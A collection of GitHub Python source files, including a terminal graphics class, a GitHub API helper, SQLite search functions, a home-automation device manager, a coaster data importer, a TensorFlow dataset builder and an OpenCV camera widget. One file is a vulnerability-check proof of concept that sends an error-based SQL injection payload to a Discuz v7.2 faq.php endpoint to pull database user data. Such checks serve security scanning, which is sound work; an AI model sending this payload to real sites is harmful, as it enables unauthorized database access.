the terminalGraphics class\r\n def refresh(self):\r\n\r\n #get dimensions of terminal\r\n dimensions = shutil.get_terminal_size()\r\n\r\n #check where screen should be positioned\r\n #if screen should be placed at the center of the terminal,\r\n #then get appropriate padding for the top, bottom, and the sides of the screen\r\n if(self.screenPosition == \"center\"):\r\n\r\n #calculate how many lines should be above and below the game screen in order to center the screen\r\n verticalPadding = (dimensions.lines - self.height - 1) // 2\r\n upperPadding = verticalPadding\r\n lowerPadding = verticalPadding\r\n\r\n #calculate how many spaces should be to the left and right of the screen\r\n horizontalPadding = (dimensions.columns - self.length - 1) // 2\r\n\r\n #get spacing before and after screen line to print\r\n spacingL = \" \" * horizontalPadding\r\n spacingR = spacingL + \"\\n\"\r\n\r\n #if the bottom left of the screen is to be drawn onto the bottom left of the terminal then do so\r\n elif(self.screenPosition == \"bott-left\"):\r\n spacingL = \"\"\r\n spacingR = \"\\n\"\r\n upperPadding = self.height - dimensions.lines\r\n lowerPadding = 0\r\n\r\n #print a carriage return to clear the terminal and print the screen to it\r\n sys.stdout.write(\"\\r\")\r\n\r\n #init empty string to hold total lines to print\r\n lineToPrint=\"\"\r\n\r\n #print out top level padding for screen\r\n for paddingLine in range(upperPadding):\r\n lineToPrint += \"\\n\"\r\n\r\n #for each line in the 2D representation of the terminal screen,\r\n #turn that line into a string and print it onto the terminal\r\n for line in self.screen:\r\n\r\n #add right spacing,\r\n lineToPrint += spacingL + \"\".join(line) + spacingR\r\n\r\n #print out bottom level padding for screen\r\n for paddingLine in range(lowerPadding):\r\n lineToPrint += \"\\n\"\r\n\r\n #print all of line to print excluding final newline char\r\n #immdeialty flush out the screen to the terminal to ensure smooth framerate\r\n print(lineToPrint)\r\n sys.stdout.flush()\r\n\r\n###############################################################################\r\n\r\n #drawPoint function\r\n #has no return value\r\n #self, reference to terminalGraphics class\r\n #point, [x,y] location of where to draw point\r\n #symbol, symbol to place at specifed point, default symbol is V\r\n def drawPoint(self, point, symbol=\"V\"):\r\n\r\n #access (x,y) point on the screen and set symbol at that point\r\n self.screen[self.height - point[1] - 1][point[0]] = symbol\r\n\r\n###############################################################################\r\n\r\n #drawVerticalLine function\r\n #self, reference to terminalGraphics class instance\r\n #x, integer refering to x value of vertical line\r\n #yPoint, [y0, y1], y values at which vertical line begins and ends\r\n def drawVerticalLine(self, x, yPoint, symbol=\"|\"):\r\n\r\n #calculate dy\r\n dy = yPoint[0] - yPoint[1]\r\n\r\n #iterate through all y-values of vertical line\r\n for y in range(abs(dy) + 1):\r\n\r\n #change absolute y value to y value relative to the user's terminal screen\r\n y += yPoint[0]\r\n\r\n #draw a point at the specifed x and y value,\r\n #use specifed x value, and calculated y value\r\n self.drawPoint([ x, y ], symbol)\r\n\r\n###############################################################################\r\n\r\n #drawline Functionn\r\n #has no return value\r\n #self, reference to instance of hte terminalGraphics class\r\n #point1, [x,y] point for starting point of a stright line\r\n #point2, [x,y] point for ending point of a stright line\r\n #symbol, string of symbol that is used to draw a straight line\r\n def drawLine(self, point1, point2, symbol=\"/\"):\r\n\r\n #calculate delta x\r\n dx = point1[0] - point2[0]\r\n\r\n #calculate delta y\r\n dy = point1[1] - point2[1]\r\n\r\n\r\n #check if dx is zero to avoid division by zero and to draw a vertical line\r\n if(dx == 0):\r\n #draw a vertical line\r\n self.verticalLine(point1[1],point2[1])\r\n\r\n #calculate the slope of the line\r\n m = dy / dx\r\n\r\n #calcuate b for y = mx + b\r\n b = point1[1] - int(m*point1[0])\r\n\r\n #loop through all x values needed to draw the line\r\n for x in range(abs(dx)):\r\n\r\n #change x from absolute coordinate system to one relative to the user's terminal screen\r\n x += point1[0]\r\n\r\n #draw a point at the specifed x and y value,\r\n #use y = mx + b to calculate the y value\r\n self.drawPoint([ x, int(m*x) + b ], symbol)\r\n\r\n###############################################################################\r\n\r\n #drawRect function\r\n #has no return value\r\n #self, reference to instance of terminalGraphics class\r\n #length, int of horizontal width of box\r\n #height, int of vertical height of box\r\n #origin, [x,y] where left-bottom point of box is drawn\r\n #verticalSymbol, text character to use to draw vertical sides of the rectangle\r\n #horizontalSymbol, text character to use to draw horizontal sides of the rectangle\r\n def drawRect(self, length, height, origin=[0,0], fill=\" \", verticalSymbol=\"|\", horizontalSymbol=\"-\"):\r\n\r\n #REBUILD THIS METHOD\r\n #iterate through all y and x positions\r\n\r\n #iterate through all the dimensions needed to draw a box, (2)\r\n for dimension in range(2):\r\n\r\n yPosition = origin[1] + (dimension * height)\r\n xPosition = origin[0] + (dimension * length)\r\n\r\n #draw side lines with distance of \"length\" in between the two vertical lines\r\n self.drawVerticalLine( xPosition, [origin[1], origin[1] + height], verticalSymbol )\r\n\r\n for dimension in range(2):\r\n\r\n yPosition = origin[1] + (dimension * height)\r\n xPosition = origin[0] + (dimension * length)\r\n\r\n #draw top and bottom of boxes with distance of \"height\" in between the horizontal lines\r\n self.drawLine( [origin[0], yPosition], [origin[0] + length + 1, yPosition], horizontalSymbol )\r\n\r\n###############################################################################\r\n\r\n #self is reference to instance of the terminalGraphics class\r\n #text is string of text to print\r\n #point refers to [x,y] cordinate of where first letter should be printed\r\n def drawText(self, text, point):\r\n\r\n #iterate through all chars within the text string\r\n for charNumber in range(len(text)):\r\n\r\n #calculate x and y position of current letter\r\n x = charNumber + point[0]\r\n y = point[1]\r\n\r\n #draw letter at correct point\r\n self.drawPoint([x,y], text[charNumber])\r\n\r\n###############################################################################\r\n\r\n #loadImage function\r\n #returns a screenlist object with all the characters forom an external file\r\n #fileName, string of file to load image from\r\n def loadImage(self, fileName):\r\n\r\n #open file\r\n f = open(fileName, \"r\")\r\n\r\n #init empty image list\r\n image = []\r\n lineCounter = -1\r\n\r\n #iterate through all lines and characters in file\r\n for line in f:\r\n\r\n #prepare new line in the image list\r\n lineCounter += 1\r\n image.append([])\r\n\r\n for char in line:\r\n if('\\n' != char):\r\n image[lineCounter].append(char)\r\n\r\n return image\r\n\r\n###############################################################################\r\n\r\n #addImage, takes image list and adds it to the screen\r\n #self, refers to instance of the terminalGraphics class\r\n #image, list of image text\r\n #x, x position of bottom left most point of the image, default value is 0\r\n #y, y position of the bottom left most point of the image, default value is 0\r\n def addImage(self, image, x=0, y=0):\r\n\r\n for lineNumber, line in enumerate(image):\r\n\r\n #get newY relative to the screen\r\n newY = lineNumber + len(self.screen) - len(image) - y\r\n\r\n for xPosition, char in enumerate(line):\r\n self.screen[newY][x+xPosition] = char\r\n","repo_name":"GaryZ700/viperEngine","sub_path":"viper/terminalGraphics/terminalGraphics.py","file_name":"terminalGraphics.py","file_ext":"py","file_size_in_byte":12139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"3717767560","text":"import requests,re,urllib3\r\n\r\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\r\ndef scan(baseurl):\r\n\tif baseurl[-1]=='/':\r\n\t\tbaseurl=baseurl\r\n\telse:\r\n\t\tbaseurl=baseurl+\"/\"\r\n\turl=baseurl+\"faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(user,0x3a,md5(1234),0x3a)%20from%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23\"\r\n\theaders={\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0\"}\r\n\tresponse=requests.get(url,headers=headers,timeout=5,verify=False)\r\n\tif response.status_code == 200 and \"81dc9bdb52d04dc20036dbd8313ed055\" in response.text and \"Discuz! info: MySQL Query Error\" in response.text:\r\n\t\tr0=True\r\n\telse:\r\n\t\tr0=False\r\n\tif r0:\r\n\t\treturn True\r\n\telse:\r\n\t\treturn False\r\n","repo_name":"SCAMagic/SCAMagicScan","sub_path":"pocs/poc-yaml-discuz-v72-sqli.py","file_name":"poc-yaml-discuz-v72-sqli.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"70"}
+{"seq_id":"13427973469","text":"import requests\r\nimport json\r\nfrom urllib.request import urlopen\r\n\r\n\r\ndef userrepos(username):\r\n if not isinstance(username, str):\r\n return \"Username is not valid\"\r\n url=\"https://api.github.com/users/USER/repos\"\r\n newurl= url[:29]+ username+url[33:]\r\n try:\r\n userdata = urlopen(newurl)\r\n repolist=[]\r\n data = json.loads(userdata.read())\r\n for i in data:\r\n repolist.append(str(i['name']))\r\n return repolist\r\n except:\r\n return(\"User Does Not Exist Error\")\r\n\r\n\r\n\r\ndef repocommits(username, repo):\r\n if not isinstance(repo, str):\r\n return \"Repo is not valid\"\r\n url=\"https://api.github.com/repos/USER/repos/commits\"\r\n newurl= url[:29]+ username+url[33]+repo+url[39:]\r\n try:\r\n userdata = urlopen(newurl)\r\n commitlist=[]\r\n data = json.loads(userdata.read())\r\n for i in data:\r\n commitlist.append(str(i['commit']))\r\n numcommits=len(commitlist)\r\n return(\"Number of commits: \" ,numcommits)\r\n except:\r\n return(\"Repo does not exist\")\r\n\r\ndef combined(username,repo):\r\n if(userrepos(username)==\"User Does Not Exist Error\"):\r\n return \"User Does Not Exist Error\"\r\n return repocommits(username,repo)\r\n\r\n","repo_name":"Sdrucker6637/SSW567HW04a","sub_path":"hw04a.py","file_name":"hw04a.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"42887758638","text":"import sqlite3 as sql\n\ndef colourSearch(c):\n db = sql.connect('Car_Database.sqlite')\n cursor = db.cursor()\n\n colour_id = c\n cursor.execute('''SELECT * FROM Cars WHERE Colour=?''', (colour_id,))\n user = cursor.fetchall()\n print(user)\n db.close()\n\ndef locationSearch(l):\n db = sql.connect('Car_Database.sqlite')\n cursor = db.cursor()\n\n location_id = l\n cursor.execute('''SELECT * FROM Cars WHERE Location=?''', (location_id,))\n user1 = cursor.fetchall()\n print(user1)\n db.close()\n\ndef seatSearch(s):\n db = sql.connect('Car_Database.sqlite')\n cursor = db.cursor()\n\n seat_id = s\n cursor.execute('''SELECT * FROM Cars WHERE \"No. of Seats\"=?''', (seat_id,))\n user2 = cursor.fetchall()\n print(user2)\n db.close()\n\ndef doorSearch(d):\n db = sql.connect('Car_Database.sqlite')\n cursor = db.cursor()\n\n door_id = d\n cursor.execute('''SELECT * FROM Cars WHERE \"No. of Doors\"=?''', (door_id,))\n user3 = cursor.fetchall()\n print(user3)\n db.close()\n\n\n#Min Price not working yet\n\ndef minPriceSearch(mn):\n db = sql.connect('Car_Database.sqlite')\n cursor = db.cursor()\n\n minPrice_id = mn\n cursor.execute('''SELECT * FROM Cars WHERE LEN(Price) >= int(minPrice_id)''', (minPrice_id,))\n user4 = cursor.fetchall()\n print(user4)\n db.close()\n","repo_name":"sokhij3/B2-Group-Project","sub_path":"Updated Search Code.py","file_name":"Updated Search Code.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"19256011877","text":"#!/usr/bin/python3\n# -*- coding: utf8 -*-\n'''\nGère les équipements\n'''\n\nfrom datetime import datetime\n# -------\nimport Attribute\nimport Command\nimport LEDPanel as DEV_LEDPanel\nimport Config\n\nclass Manager:\n def __init__(self):\n self.devices = []\n self.devices.append(General())\n self.devices.append(LEDPanel())\n\n def execute(self, query):\n device = None\n for dev in self.devices:\n if (dev.getName() == query.getTargetDevice()):\n device = dev\n break\n\n if (device == None):\n return Command.Answer(Command.Answer.CODE_ERROR_UNKNOW_DEVICE, Command.Answer.ERROR_CODE_TO_TEXT[Command.Answer.CODE_ERROR_UNKNOW_DEVICE])\n\n if (query.getMode() == Command.Query.MODE_READ):\n return device.get(query.getArgument().getName())\n else:\n return device.set(query.getArgument().getName(), query.getArgument().getValue())\n\nclass BaseDevice:\n def __init__(self):\n self.name = None\n self.attributes = []\n\n def isAttributeExists(self, attributeName):\n for attribute in self.attributes:\n if (attribute.getName() == attributeName):\n return True\n\n return False\n\n def getName(self):\n return self.name\n\n def getAttribute(self, attributeName):\n attr = None\n for attr in self.attributes:\n if (attributeName == attr.getName()):\n break\n\n return attr\n\n def get(self, attributName):\n ''' Méthode à surcharger '''\n\n def set(self, attributeName, attributeValue):\n ''' Méthode à surcharger '''\n\nclass General(BaseDevice):\n def __init__(self):\n super().__init__()\n self.name = \"general\"\n self.attributes.append(Attribute.ReadOnly(\"heure\"))\n self.attributes.append(Attribute.ReadOnly(\"date\"))\n self.attributes.append(Attribute.ReadOnly(\"temps\"))\n\n def get(self, attributeName):\n r = Command.Answer(Command.Answer.CODE_ERROR_UNKNOW_ATTRIBUTE, Command.Answer.ERROR_CODE_TO_TEXT[Command.Answer.CODE_ERROR_UNKNOW_ATTRIBUTE])\n now = datetime.now()\n curTime = '{dt.hour} heure {dt.minute}'.format(dt=now)\n curDate = '{dt.day}/{dt.month}/{dt.year}'.format(dt=now)\n\n if (attributeName == \"heure\"):\n r = Command.Answer(Command.Answer.CODE_OK, \"Il est %s.\" % (curTime))\n elif (attributeName == \"date\"):\n r = Command.Answer(Command.Answer.CODE_OK, \"Nous sommes le %s.\" % (curDate))\n elif (attributeName == \"temps\"):\n r = Command.Answer(Command.Answer.CODE_OK, \"Nous sommes le %s, il est %s.\" % (curDate, curTime))\n\n return r\n\n def set(self, attributeName, attributeValue):\n return Command.Answer(Command.Answer.CODE_ERROR_READONLY_ATTRIBUTE, Command.Answer.ERROR_CODE_TO_TEXT[Command.Answer.CODE_ERROR_READONLY_ATTRIBUTE])\n\nclass LEDPanel(BaseDevice):\n def __init__(self):\n super().__init__()\n self.name = \"bandeau\"\n self.controller = DEV_LEDPanel.Controller(Config.LEDPANEL_MAC_ADDRESS)\n self.attributes.append(Attribute.Boolean(\"alimentation\"))\n self.attributes.append(Attribute.Integer(\"luminosité\"))\n self.attributes.append(Attribute.TextColor(\"couleur\"))\n\n '''\n def __del__(self):\n self.controller.stopAdapter()\n '''\n\n def get(self, attributName):\n return Command.Answer(Command.Answer.CODE_ERROR_INVALID_VALUE, \"Cet équipement ne supporte pas la lecture d'attribut.\")\n\n def set(self, attributeName, attributeValue):\n r = Command.Answer(Command.Answer.CODE_ERROR_UNKNOW_ATTRIBUTE, Command.Answer.ERROR_CODE_TO_TEXT[Command.Answer.CODE_ERROR_UNKNOW_ATTRIBUTE])\n attribute = self.getAttribute(attributeName)\n\n if (attribute == None):\n return r\n\n r = attribute.setValue(attributeValue)\n if (r == False):\n return Command.Answer(Command.Answer.CODE_ERROR_INVALID_VALUE, Command.Answer.ERROR_CODE_TO_TEXT[Command.Answer.CODE_ERROR_INVALID_VALUE])\n\n if (attributeName == \"alimentation\"):\n if (attributeValue == \"0\"):\n self.controller.powerOff()\n else:\n self.controller.powerOn()\n elif (attributeName == \"luminosité\"):\n self.controller.setBrightness(int(attributeValue))\n elif (attributeName == \"couleur\"):\n self.controller.setColor(*attribute.getValue())\n\n return Command.Answer(Command.Answer.CODE_OK, \"La valeur de l'attribut a été modifiée avec succèes !\")\n","repo_name":"kadeseb/Nestor","sub_path":"Code/Device.py","file_name":"Device.py","file_ext":"py","file_size_in_byte":4571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"74904608545","text":"import numpy\nimport math\nimport scipy.misc\n\ndef lagre_bilde(data: str, høyde: int, bredde: int, sti: str):\n bilde = numpy.array(list(data), dtype=int).reshape((høyde, bredde))\n scipy.misc.toimage(bilde, cmin=0.0, cmax=1.0).save(sti)\n\ndef main():\n BILDEFIL = 'img.txt'\n\n with open(BILDEFIL) as f:\n data = f.read()\n\n lengde = len(data)\n\n # Finner gyldige høyde x bredde\n oppløsninger = []\n\n for i in range(2,math.ceil(math.sqrt(lengde))):\n if lengde % i == 0:\n oppløsninger.append((i, lengde//i))\n oppløsninger.append((lengde//i, i))\n\n # Lagrer alle bildene\n for oppløsning in oppløsninger:\n lagre_bilde(data,\n oppløsning[0],\n oppløsning[1],\n f\"./bilder/{oppløsning[0]}x{oppløsning[1]}.png\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"Boren/knowit-julekalender-2019","sub_path":"03/luke03.py","file_name":"luke03.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"no","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"11345431875","text":"from homeserver.models.coasters.park import CoasterPark\nfrom homeserver.models.coasters.ride import CoasterRide\nfrom homeserver.models.coasters.coasterTrack import CoasterTrack\nfrom homeserver.database import db\nfrom homeserver.app import app\n\nfrom sqlalchemy.orm.exc import NoResultFound\n\nimport json\nimport re\n\ncoasters = []\nparks = []\n\nwith open('data/combined.json') as data:\n data = json.load(data)\n for coaster in data[\"coasters\"]:\n coasters.append(coaster)\n for park in data[\"parks\"]:\n parks.append(park)\n\nwith app.app_context():\n for park in parks:\n status = park[\"status\"]\n if status == \"Defunct\":\n status = 2\n elif status == \"SBNO\":\n status = 3\n else:\n status = 1\n #pk = CoasterPark(name=park[\"name\"], rcdbID=park[\"rcdbId\"], status=status, address=park[\"address\"], openDate=park[\"openDate\"], statusDate=park[\"statusDate\"])\n \n #db.session.add(pk)\n\n db.session.commit()\n\n badParks = set()\n\n for coaster in coasters:\n status = coaster[\"status\"]\n if status == \"Defunct\":\n status = 2\n else:\n status = 1\n\n try:\n park = CoasterPark.query.filter_by(rcdbID=coaster[\"parkid\"]).one()\n cstr = CoasterRide(park=park.id, name=coaster[\"name\"], rcdbID=coaster[\"rcdbid\"], ridden=False, coasterOrRide=True, statusDate=coaster[\"statusDate\"], openDate=coaster[\"openDate\"], status=status)\n db.session.add(cstr)\n except NoResultFound:\n badParks.add(coaster[\"parkid\"])\n print(\"No result found for \", coaster[\"parkid\"])\n\n for coaster in coasters:\n for track in coaster[\"tracks\"]:\n cstr = CoasterRide.query.filter_by(rcdbID=coaster[\"rcdbid\"]).one()\n t = CoasterTrack(modelLayout=coaster[\"modelLayout\"], configuration=coaster[\"configuration\"], modelCategory=coaster[\"modelCategory\"], make=coaster[\"make\"], coasterType=coaster[\"coasterType\"], coaster=cstr.id)\n \n length = db.Column(db.Integer)\n speed = db.Column(db.Integer)\n elements = db.Column(db.String(500), unique=False)\n duration = db.Column(db.String(10), unique=False)\n verticalAngle = db.Column(db.Integer)\n drop = db.Column(db.Integer)\n \n if \"inversions\" in track and track[\"inversions\"] and len(track[\"inversions\"]) > 0:\n t.inversions = int(re.sub('[^0-9]', '', str(track[\"inversions\"])))\n\n if \"height\" in track and track[\"height\"] and len(track[\"height\"]) > 0:\n t.height = int(re.sub('[^0-9]', '', str(track[\"height\"])))\n\n if \"length\" in track and track[\"length\"] and len(track[\"length\"]) > 0:\n t.length = int(re.sub('[^0-9]', '', str(track[\"length\"])))\n \n if \"speed\" in track and track[\"speed\"] and len(track[\"speed\"]) > 0:\n t.speed = int(re.sub('[^0-9]', '', str(track[\"speed\"])))\n\n if \"elements\" in track:\n t.elements = \", \".join(track[\"elements\"])\n\n if \"duration\" in track:\n t.duration = track[\"duration\"]\n\n if \"vertical angle\" in track and track[\"vertical angle\"] and len(track[\"vertical angle\"]) > 0:\n t.verticalAngle = int(re.sub('[^0-9]', '', str(track[\"vertical angle\"])))\n\n if \"drop\" in track and track[\"drop\"] and len(track[\"drop\"]) > 0:\n t.drop = int(re.sub('[^0-9]', '', str(track[\"drop\"])))\n\n db.session.add(t)\n\n db.session.commit()\n\nprint(badParks)","repo_name":"joshimbriani/homeserver","sub_path":"importRCDBData.py","file_name":"importRCDBData.py","file_ext":"py","file_size_in_byte":3591,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"17428818453","text":"from uuid import uuid4\nimport csv\nimport requests\nimport yaml\nfrom convert import ewtstobo\n\nclass MyDumper(yaml.Dumper):\n\n def increase_indent(self, flow=False, indentless=False):\n return super(MyDumper, self).increase_indent(flow, False)\n\n\ndef represent_none(self, _):\n return self.represent_scalar('tag:yaml.org,2002:null', '')\n\n\ndef write_mapping(op_work_id,bdrc_work_id):\n map_file = \"./works/mappings/bdrc.csv\"\n with open(map_file, \"a\") as file:\n csvwriter = csv.writer(file)\n csvwriter.writerow([op_work_id, bdrc_work_id])\n\n\ndef get_meta(bdrc_work_id, op_work_id):\n api_id = f\"http://purl.bdrc.io/query/graph/OP_info?R_RES=bdr:{bdrc_work_id}&format=json\"\n response = requests.get(api_id)\n\n \n if response.status_code != 200:\n return\n\n content = response.json()\n meta_dict = {}\n meta_dict[\"id\"] = str(op_work_id)\n\n meta_dict[\"bdrc-work-id\"] = bdrc_work_id\n li = []\n\n if isavailable(\"http://www.w3.org/2004/02/skos/core#prefLabel\",content[f\"http://purl.bdrc.io/resource/{bdrc_work_id}\"]) == True:\n title = ewtstobo(content[f\"http://purl.bdrc.io/resource/{bdrc_work_id}\"][\"http://www.w3.org/2004/02/skos/core#prefLabel\"][0][\"value\"])\n meta_dict[\"title\"] = title\n else:\n meta_dict[\"title\"] = None\n\n if isavailable(\"http://www.w3.org/2004/02/skos/core#altLabel\",content[f\"http://purl.bdrc.io/resource/{bdrc_work_id}\"])==True:\n for id in content[f\"http://purl.bdrc.io/resource/{bdrc_work_id}\"][\"http://www.w3.org/2004/02/skos/core#altLabel\"]:\n li.append(ewtstobo(id[\"value\"]))\n\n if not li:\n meta_dict[\"alternative-title\"]=None\n else:\n meta_dict[\"alternative-title\"] = li\n\n meta_dict[\"author\"] = None\n\n if isavailable(\"http://purl.bdrc.io/ontology/core/isRoot\",content[f\"http://purl.bdrc.io/resource/{bdrc_work_id}\"]) == True:\n value = content[f\"http://purl.bdrc.io/resource/{bdrc_work_id}\"][\"http://purl.bdrc.io/ontology/core/isRoot\"][0][\"value\"]\n print(value)\n meta_dict[\"isRoot\"]= value.strip(\"'\")\n else:\n meta_dict[\"isRoot\"] = None\n\n if isavailable(\"http://www.w3.org/1999/02/22-rdf-syntax-ns#type\",content[f\"http://purl.bdrc.io/resource/{bdrc_work_id}\"]) == True: \n meta_dict[\"type-definition\"] = content[f\"http://purl.bdrc.io/resource/{bdrc_work_id}\"][\"http://www.w3.org/1999/02/22-rdf-syntax-ns#type\"][0][\"value\"]\n else:\n meta_dict[\"type-definition\"] = None\n\n if isavailable(\"http://purl.bdrc.io/ontology/core/language\",content[f\"http://purl.bdrc.io/resource/{bdrc_work_id}\"]) ==True:\n meta_dict[\"language\"] = content[f\"http://purl.bdrc.io/resource/{bdrc_work_id}\"][\n \"http://purl.bdrc.io/ontology/core/language\"][0][\"value\"]\n\n meta_dict[\"wiki-data-id\"] = None\n\n meta_dict[\"instances\"] = None\n\n return meta_dict\n\ndef isavailable(param,body):\n if param in body:\n return True\n else:\n return False \n\ndef write_works(bdrc_work_id, op_work_id):\n meta_content = get_meta(bdrc_work_id, op_work_id)\n yaml.add_representer(type(None), represent_none)\n\n yml_file = f\"./yaml/{op_work_id}.yml\"\n if meta_content is None:\n return\n with open(yml_file, \"w\", encoding = \"utf-8\") as file:\n yaml.dump(meta_content, file,Dumper=MyDumper,sort_keys=False,\n default_flow_style=False, allow_unicode = True)\n\ndef get_uuid():\n return uuid4().hex\n\nif __name__ == \"__main__\":\n file_path = \"clusters-manual.csv\"\n with open(file_path, \"r\") as csvfile:\n csvreader = csv.reader(csvfile)\n for row in csvreader:\n op_work_id = get_uuid()\n write_mapping(op_work_id,row[1])\n write_works(row[1], op_work_id)\n print(\"pass\")\n","repo_name":"jungtop/Works","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":3750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"29335205075","text":"import io\nimport re\nimport zipfile\n\nfrom absl import logging\nfrom tensorflow_datasets.core.utils.lazy_imports_utils import tensorflow as tf\nimport tensorflow_datasets.public_api as tfds\n\n_CITATION = \"\"\"\\\n@Inproceedings (Conference){asirra-a-captcha-that-exploits-interest-aligned-manual-image-categorization,\nauthor = {Elson, Jeremy and Douceur, John (JD) and Howell, Jon and Saul, Jared},\ntitle = {Asirra: A CAPTCHA that Exploits Interest-Aligned Manual Image Categorization},\nbooktitle = {Proceedings of 14th ACM Conference on Computer and Communications Security (CCS)},\nyear = {2007},\nmonth = {October},\npublisher = {Association for Computing Machinery, Inc.},\nurl = {https://www.microsoft.com/en-us/research/publication/asirra-a-captcha-that-exploits-interest-aligned-manual-image-categorization/},\nedition = {Proceedings of 14th ACM Conference on Computer and Communications Security (CCS)},\n}\n\"\"\"\n\n_URL = (\n \"https://download.microsoft.com/download/3/E/1/\"\n \"3E1C3F21-ECDB-4869-8368-6DEBA77B919F/kagglecatsanddogs_5340.zip\"\n)\n_NUM_CORRUPT_IMAGES = 1738\n_DESCRIPTION = (\n \"A large set of images of cats and dogs. \"\n \"There are %d corrupted images that are dropped.\" % _NUM_CORRUPT_IMAGES\n)\n\n_NAME_RE = re.compile(r\"^PetImages[\\\\/](Cat|Dog)[\\\\/]\\d+\\.jpg$\")\n\n\nclass CatsVsDogs(tfds.core.GeneratorBasedBuilder):\n \"\"\"Cats vs Dogs.\"\"\"\n\n VERSION = tfds.core.Version(\"4.0.1\")\n RELEASE_NOTES = {\n \"4.0.0\": \"New split API (https://tensorflow.org/datasets/splits)\",\n \"4.0.1\": (\n \"Recoding images in generator to fix corrupt JPEG data warnings\"\n \" (https://github.com/tensorflow/datasets/issues/2188)\"\n ),\n }\n\n def _info(self):\n return tfds.core.DatasetInfo(\n builder=self,\n description=_DESCRIPTION,\n features=tfds.features.FeaturesDict({\n \"image\": tfds.features.Image(),\n \"image/filename\": tfds.features.Text(), # eg 'PetImages/Dog/0.jpg'\n \"label\": tfds.features.ClassLabel(names=[\"cat\", \"dog\"]),\n }),\n supervised_keys=(\"image\", \"label\"),\n homepage=(\n \"https://www.microsoft.com/en-us/download/details.aspx?id=54765\"\n ),\n citation=_CITATION,\n )\n\n def _split_generators(self, dl_manager):\n path = dl_manager.download(_URL)\n\n # There is no predefined train/val/test split for this dataset.\n return [\n tfds.core.SplitGenerator(\n name=tfds.Split.TRAIN,\n gen_kwargs={\n \"archive\": dl_manager.iter_archive(path),\n },\n ),\n ]\n\n def _generate_examples(self, archive):\n \"\"\"Generate Cats vs Dogs images and labels given a directory path.\"\"\"\n num_skipped = 0\n for fname, fobj in archive:\n res = _NAME_RE.match(fname)\n if not res: # README file, ...\n continue\n label = res.group(1).lower()\n if tf.compat.as_bytes(\"JFIF\") not in fobj.peek(10):\n num_skipped += 1\n continue\n\n # Some images caused 'Corrupt JPEG data...' messages during training or\n # any other iteration recoding them once fixes the issue (discussion:\n # https://github.com/tensorflow/datasets/issues/2188).\n # Those messages are now displayed when generating the dataset instead.\n img_data = fobj.read()\n img_tensor = tf.image.decode_image(img_data)\n img_recoded = tf.io.encode_jpeg(img_tensor)\n\n # Converting the recoded image back into a zip file container.\n buffer = io.BytesIO()\n with zipfile.ZipFile(buffer, \"w\") as new_zip:\n new_zip.writestr(fname, img_recoded.numpy())\n new_fobj = zipfile.ZipFile(buffer).open(fname)\n\n record = {\n \"image\": new_fobj,\n \"image/filename\": fname,\n \"label\": label,\n }\n yield fname, record\n\n if num_skipped != _NUM_CORRUPT_IMAGES:\n raise ValueError(\n \"Expected %d corrupt images, but found %d\"\n % (_NUM_CORRUPT_IMAGES, num_skipped)\n )\n logging.warning(\"%d images were corrupted and were skipped\", num_skipped)\n","repo_name":"tensorflow/datasets","sub_path":"tensorflow_datasets/image_classification/cats_vs_dogs.py","file_name":"cats_vs_dogs.py","file_ext":"py","file_size_in_byte":4014,"program_lang":"python","lang":"en","doc_type":"code","stars":4045,"dataset":"github-code","pt":"70"}
+{"seq_id":"24476685712","text":"'''\nCoroBot Camera Portal\nDeveloper: CoroWare\nDate: 20, October 2014\nVersion 0.01\n\nAuthor: Cameron Owens \n\n\nPython File for Managing and Creating Camera Portal\n'''\n\n\nimport cv2\nfrom PySide import QtCore, QtGui\nimport numpy\nimport sys\n\nclass VideoDisplayPort(QtGui.QWidget):\n\n def __init__(self,parent, colorMode = 'RGB'):\n QtGui.QWidget.__init__(self)\n# self.video_size = QSize(320, 240)\n self.setup_ui()\n self.setup_camera()\n self.colorMode = colorMode\n def setup_ui(self):\n \"\"\"Initialize widgets.\n \"\"\"\n self.videoDisplay = QtGui.QLabel()\n# self.image_label.setFixedSize(self.video_size)\n \n \n self.main_layout = QtGui.QGridLayout(self)\n self.main_layout.addWidget(self.videoDisplay, 0,0)\n \n self.setLayout(self.main_layout)\n \n def setup_camera(self):\n \"\"\"Initialize camera.\n \"\"\"\n self.capture = cv2.VideoCapture(0)\n \n self.timer = QtCore.QTimer()\n self.timer.timeout.connect(self.display_video_stream)\n self.timer.start(30)\n \n def display_video_stream(self):\n \"\"\"Read frame from camera and repaint QLabel widget.\n \"\"\"\n _, frame = self.capture.read()\n if self.colorMode == 'RGB':\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n elif self.colorMode=='BW':\n frame = cv2.cvtColor(frame, cv2.THRESH_BINARY_INV)\n elif self.colorMode=='TOL_Zero':\n frame = cv2.cvtColor(frame, cv2.THRESH_TOZERO) \n image = QtGui.QImage(frame, frame.shape[1], frame.shape[0], \n frame.strides[0], QtGui.QImage.Format_RGB888)\n self.videoDisplay.setPixmap(QtGui.QPixmap.fromImage(image))\n","repo_name":"CandidCypher/SparkControl0.2.0","sub_path":"CameraPortal.py","file_name":"CameraPortal.py","file_ext":"py","file_size_in_byte":1737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
